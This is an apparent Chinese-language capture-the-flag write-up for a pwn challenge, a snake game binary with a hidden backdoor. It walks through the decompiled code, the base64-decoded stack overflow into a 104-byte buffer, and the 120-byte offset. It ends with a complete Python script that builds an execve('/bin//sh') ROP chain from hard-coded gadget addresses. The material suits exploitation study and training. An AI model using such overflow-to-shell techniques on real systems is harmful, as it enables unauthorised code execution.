第八届工业信息安全技能大赛全国复赛snake_wp

pwn题 snake writeup

多少有点不自信,太久没做题,看到题都有点怕怕的

这个程序是一个贪食蛇游戏,主程序如下:

/*
 * Main game loop of the snake binary (IDA pseudocode; IDA's auto-names kept).
 * One key is read per tick with getchar(). W/A/S/D steer, lowercase 'q' quits
 * and -- only when the score is exactly 2 -- calls the binsh_401427() backdoor
 * first. a1/a2 and the v2..v5 register temps are decompiler artefacts of the
 * register arguments forwarded to print_score_400E09.
 */
__int64 __fastcall main_4015A5(__int64 a1, __int64 a2)
{
  int v2; // edx
  int v3; // ecx
  int v4; // er8
  int v5; // er9
  int v7; // [rsp+Ch] [rbp-4h]  -- the key just read (or -1)

  sub_400B6D();                 // one-time setup; body not shown here (presumably board/snake init)
  do
  {
LABEL_2:
    sub_40158D();               // per-tick helpers; their roles are not visible in this listing
    sub_400CA6();
    print_score_400E09(a1, a2, v2, v3, v4, v5);
    v7 = getchar();
  }
  while ( v7 == -1 );           // -1 (no byte available / EOF) is retried -- stdin is presumably non-blocking, set up in sub_400B6D
  switch ( v7 )
  {
    /*
     * dword_6BEE04 looks like the current heading: W=0, D=1, S=2, A=3.
     * Each case refuses the 180-degree reversal (e.g. 'a' is ignored while
     * the heading is 1/'d'), otherwise the heading is updated and the snake
     * moves via LABEL_16.
     */
    case 'A':
    case 'a':
      if ( dword_6BEE04 != 1 )
        dword_6BEE04 = 3;
      goto LABEL_16;
    case 'D':
    case 'd':
      if ( dword_6BEE04 != 3 )
        dword_6BEE04 = 1;
      goto LABEL_16;
    case 'S':
    case 's':
      if ( dword_6BEE04 )
        dword_6BEE04 = 2;
      goto LABEL_16;
    case 'W':
    case 'w':
      if ( dword_6BEE04 != 2 )
        dword_6BEE04 = 0;
      goto LABEL_16;
    case 'q':                   // lowercase only: 'Q' falls into default and just moves
      if ( score_dword_6BD3F0 == 2 )   // exact equality -- score must be 2, not >= 2
        binsh_401427();         // backdoor (see below)
      return 0LL;
    default:
LABEL_16:
      sub_400E29();             // advance the snake one step (inferred from the loop shape)
      if ( !(unsigned int)sub_400EDF() )   // nonzero return => game over
      {
        if ( qword_6BE4A0[0] == qword_6BE480 )   // presumably head position == food position
        {
          ++score_dword_6BD3F0;
          ++dword_6BEE00;
          sub_4014A7();         // presumably respawn food / grow the snake
        }
        a1 = 100000LL;          // artefact: the register holding a1 is reused for the usleep argument
        usleep(0x186A0u);       // 100 ms tick
        goto LABEL_2;
      }
      IO_puts("Game Over!");
      return 0LL;
  }
}

根据这段代码可以知道,只有当得分恰好为 2(`score_dword_6BD3F0 == 2`,是相等判断而不是大于等于)时,输入小写 `q` 退出才会进入后门;吃到第 3 个食物之后再按 q 就只会正常退出,所以要在得分为 2 时立刻按 q(大写 Q 不会走这个分支)。
后门程序如下:

/*
 * Backdoor reached from main_4015A5 when the score is exactly 2 and 'q' is
 * pressed. Reads up to 0x400 bytes of base64, decodes them, and memmove()s the
 * decoded bytes into a 104-byte stack buffer using the decoded length -- there
 * is no bound check against sizeof(v3). v3 lives at rbp-0x70, so 0x70 bytes
 * reach the saved rbp and 0x78 = 120 bytes reach the return address. No
 * stack-canary load (__readfsqword) appears in the decompilation.
 */
__int64 binsh_401427()
{
  int v1; // [rsp+Ch] [rbp-474h] BYREF   -- decoded length, written by b64decode_40117D
  char buf[1024]; // [rsp+10h] [rbp-470h] BYREF   -- raw base64 input
  char v3[104]; // [rsp+410h] [rbp-70h] BYREF   -- overflow target
  __int64 v4; // [rsp+478h] [rbp-8h]   -- pointer to the decoded bytes (memmove source)

  IO_puts("?www!dev#etc$/bin/sh");
  IO_fflush(off_6BB868);
  getchar();                            // eats one byte first (typically the '\n' after 'q')
  _libc_read(0, buf, 0x400uLL);         // at most 1024 bytes (~768 decoded for standard base64); return value ignored
  v4 = b64decode_40117D((__int64)buf, &v1);   // custom decoder; v1 receives the output length
  return j___libc_memmove_ifunc_0((__int64)v3, v4, v1);// copies v1 decoded bytes into the 104-byte v3 -- the stack overflow
}

这里先打印"?www!dev#etc$/bin/sh",接着 getchar() 会先吃掉一个字节(通常是 q 后面的换行),然后 read 最多 0x400 = 1024 字节到 buf,再经过 base64 解码(这里可以通过输入一些 base64 字符串看出),解码后的数据按解码长度 v1 拷贝到只有 104 字节的 v3,没有任何长度检查,1024 字节的 base64 最多可解出 768 字节,所以这里存在栈溢出。v3 位于 rbp-0x70,覆盖 0x70 字节到 saved rbp,再 8 字节就是返回地址,因此填充长度为 120;反编译结果里也没有看到 canary 的读取。
img

然后ROPgadget一把梭

ROPgadget --binary pwn --ropchain

选取 payload(ROPgadget 生成的链依赖固定地址,要求二进制无 PIE;另外 base64 编码后的长度必须不超过 1024 字节才能被那一次 read 完整读入,下面这条链 120 + 608 = 728 字节,编码后 972 个字符,刚好够用)

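#!/usr/bin/env python3
"""execve("/bin//sh") ROP chain for the snake challenge's binsh_401427 backdoor.

Generated by ``ROPgadget --binary pwn --ropchain`` and then tidied up.  Every
address below is absolute, so the chain only works against the exact challenge
binary (the decompilation shows libc symbols inside the binary, so it looks
statically linked and non-PIE -- confirm with checksec before reusing).

Delivery, as far as the decompilation shows: reach a score of exactly 2, press
``q`` (lowercase), then send the base64 line printed by this script.
binsh_401427() first does one getchar() (which eats the newline after ``q``),
then read()s at most 0x400 bytes, base64-decodes them and memmove()s the
decoded bytes into a 104-byte stack buffer at rbp-0x70.  The return address
therefore sits 0x70 + 8 = 120 bytes past the start of that buffer.
"""

from base64 import b64encode
from struct import pack

# Gadgets (absolute addresses in the challenge binary).
POP_RSI_RET = 0x00000000004113f3        # pop rsi ; ret
POP_RAX_RET = 0x00000000004005af        # pop rax ; ret
POP_RDI_RET = 0x00000000004006a6        # pop rdi ; ret
POP_RDX_RET = 0x000000000044cb86        # pop rdx ; ret
MOV_QRSI_RAX_RET = 0x0000000000480bb1   # mov qword ptr [rsi], rax ; ret
XOR_RAX_RAX_RET = 0x00000000004458a0    # xor rax, rax ; ret
ADD_RAX_1_RET = 0x0000000000475e30      # add rax, 1 ; ret
SYSCALL = 0x0000000000401dac            # syscall

# Writable scratch memory for the execve arguments.
DATA = 0x00000000006bb0e0     # @ .data      : receives "/bin//sh"
DATA_NULL = DATA + 8          # @ .data + 8  : zeroed qword (terminator and the NULL argv/envp entry)

SYS_EXECVE = 0x3b             # x86-64 execve syscall number

# Offset from v3 (the 104-byte buffer at rbp-0x70) to the saved return address.
RET_OFFSET = 0x70 + 8

# The backdoor's single read() accepts at most this many bytes of base64 text.
READ_LIMIT = 0x400


def qword(value: int) -> bytes:
    """Pack one little-endian 64-bit value."""
    return pack('<Q', value)


def _store_rax_at(addr: int, load_rax: bytes) -> bytes:
    """Gadget sequence: rsi = addr; <load_rax>; [rsi] = rax."""
    return qword(POP_RSI_RET) + qword(addr) + load_rax + qword(MOV_QRSI_RAX_RET)


def build_chain() -> bytes:
    """Return the un-padded ROP chain for execve("/bin//sh", &NULL, &NULL)."""
    chain = b''
    # .data     <- "/bin//sh" (exactly 8 bytes; the terminator is the next qword)
    chain += _store_rax_at(DATA, qword(POP_RAX_RET) + b'/bin//sh')
    # .data + 8 <- 0 (string terminator, and the NULL that argv/envp point at)
    chain += _store_rax_at(DATA_NULL, qword(XOR_RAX_RAX_RET))
    # rdi = path, rsi = argv, rdx = envp
    chain += qword(POP_RDI_RET) + qword(DATA)
    chain += qword(POP_RSI_RET) + qword(DATA_NULL)
    chain += qword(POP_RDX_RET) + qword(DATA_NULL)
    # rax = SYS_execve.  ROPgadget builds this as xor + 0x3b increments to stay
    # NUL-free; every address in this chain already contains NUL bytes and the
    # input path (read + base64) is binary-safe, so `pop rax ; 0x3b` would
    # presumably work too.  The generator's form is kept so the bytes match the
    # chain that was actually used.
    chain += qword(XOR_RAX_RAX_RET) + qword(ADD_RAX_1_RET) * SYS_EXECVE
    chain += qword(SYSCALL)
    return chain


p = build_chain()
payload = b'a' * RET_OFFSET + p


if __name__ == '__main__':
    encoded = b64encode(payload)
    # Anything past READ_LIMIT is dropped by the single read(), which would
    # silently truncate the chain.
    if len(encoded) > READ_LIMIT:
        raise SystemExit(f'encoded payload is {len(encoded)} bytes, exceeds read limit {READ_LIMIT}')
    # Emit the bare base64 text: print(bytes) would wrap it in b'...' and the
    # quotes would reach the target's decoder.  The trailing newline is assumed
    # to be tolerated by the decoder, as with the original script.
    print(encoded.decode('ascii'))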